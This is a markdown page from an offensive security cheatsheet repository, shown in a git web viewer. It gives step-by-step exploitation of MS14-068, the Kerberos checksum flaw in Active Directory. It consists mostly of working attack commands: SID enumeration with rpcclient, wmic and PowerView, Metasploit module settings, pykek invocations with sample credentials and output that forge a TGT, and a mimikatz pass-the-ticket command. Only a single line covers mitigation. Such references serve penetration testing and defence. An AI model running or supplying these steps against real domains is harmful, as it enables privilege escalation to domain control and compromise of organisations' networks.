daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ms14-068.md (4212B)


      1 ---
      2 title: "MS14-068 Checksum Validation"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/CVE/MS14-068.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/CVE/MS14-068.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # MS14-068 Checksum Validation
     12 
     13 This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
     14 
     15 * RPCClient
     16 
     17   ```powershell
     18   rpcclient $> lookupnames john.smith
     19   john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
     20   ```
     21 
     22 * WMI
     23 
     24   ```powershell
     25   wmic useraccount get name,sid
     26   Administrator  S-1-5-21-3415849876-833628785-5197346142-500   
     27   Guest          S-1-5-21-3415849876-833628785-5197346142-501   
     28   Administrator  S-1-5-21-297520375-2634728305-5197346142-500   
     29   Guest          S-1-5-21-297520375-2634728305-5197346142-501   
     30   krbtgt         S-1-5-21-297520375-2634728305-5197346142-502   
     31   lambda         S-1-5-21-297520375-2634728305-5197346142-1110 
     32   ```
     33 
     34 * Powerview
     35 
     36   ```powershell
     37   Convert-NameToSid high-sec-corp.localkrbtgt
     38   S-1-5-21-2941561648-383941485-1389968811-502
     39   ```
     40 
     41 * netexec: `netexec ldap DC1.lab.local -u username -p password -k --get-sid`  
     42 
     43 ```bash
     44 Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
     45 ```
     46 
     47 Generate a ticket with `metasploit` or `pykek`
     48 
     49 ```powershell
     50 Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
     51    Name      Current Setting                                Required  Description
     52    ----      ---------------                                --------  -----------
     53    DOMAIN    LABDOMAIN.LOCAL                                yes       The Domain (upper case) Ex: DEMO.LOCAL
     54    PASSWORD  P@ssw0rd                                       yes       The Domain User password
     55    RHOSTS    10.10.10.10                                    yes       The target address range or CIDR identifier
     56    RPORT     88                                             yes       The target port
     57    Timeout   10                                             yes       The TCP timeout to establish connection and read data
     58    USER      lambda                                         yes       The Domain User
     59    USER_SID  S-1-5-21-297520375-2634728305-5197346142-1106  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
     60 ```
     61 
     62 ```powershell
     63 # Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
     64 $ git clone https://github.com/SecWiki/windows-kernel-exploits
     65 $ python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
     66 $ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
     67 $ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
     68 $ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066
     69 -1105
     70   [+] Building AS-REQ for msfdc01.metasploitable.local... Done!
     71   [+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
     72   [+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
     73   [+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
     74   [+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
     75   [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
     76   [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
     77   [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
     78   [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!
     79 ```
     80 
     81 Then use `mimikatz` to load the ticket.
     82 
     83 ```powershell
     84 mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
     85 ```
     86 
     87 ## Mitigations
     88 
     89 * Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780
     90 
     91 ## References
     92 
     93 * [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/)